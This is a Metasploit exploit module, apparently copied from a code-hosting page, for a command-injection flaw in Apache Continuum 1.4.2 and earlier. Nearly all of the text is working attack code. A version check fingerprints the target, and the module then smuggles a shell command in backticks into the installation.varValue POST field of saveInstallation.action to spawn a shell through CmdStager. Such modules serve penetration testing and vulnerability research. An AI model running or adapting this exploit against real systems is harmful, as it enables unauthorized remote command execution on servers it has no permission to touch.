Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/linux/http/apache_continuum_cmd_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::CmdStager1011def initialize(info = {})12super(update_info(info,13'Name' => 'Apache Continuum Arbitrary Command Execution',14'Description' => %q{15This module exploits a command injection in Apache Continuum <= 1.4.2.16By injecting a command into the installation.varValue POST parameter to17/continuum/saveInstallation.action, a shell can be spawned.18},19'Author' => [20'David Shanahan', # Proof of concept21'wvu' # Metasploit module22],23'References' => [24%w{EDB 39886}25],26'DisclosureDate' => '2016-04-06',27'License' => MSF_LICENSE,28'Platform' => 'linux',29'Arch' => [ARCH_X86, ARCH_X64],30'Privileged' => false,31'Targets' => [32['Apache Continuum <= 1.4.2', {}]33],34'DefaultTarget' => 035))3637register_options([38Opt::RPORT(8080)39])40end4142def check43res = send_request_cgi(44'method' => 'GET',45'uri' => '/continuum/about.action'46)4748if res && res.body.include?('1.4.2')49CheckCode::Appears50elsif res && res.code == 20051CheckCode::Detected52else53CheckCode::Safe54end55end5657def exploit58print_status('Injecting CmdStager payload...')59execute_cmdstager60end6162def execute_command(cmd, opts = {})63send_request_cgi(64'method' => 'POST',65'uri' => '/continuum/saveInstallation.action',66'vars_post' => {67'installation.name' => Rex::Text.rand_text_alpha(8),68'installation.type' => 'jdk',69'installation.varValue' => '`' + cmd + '`'70}71)72end73end747576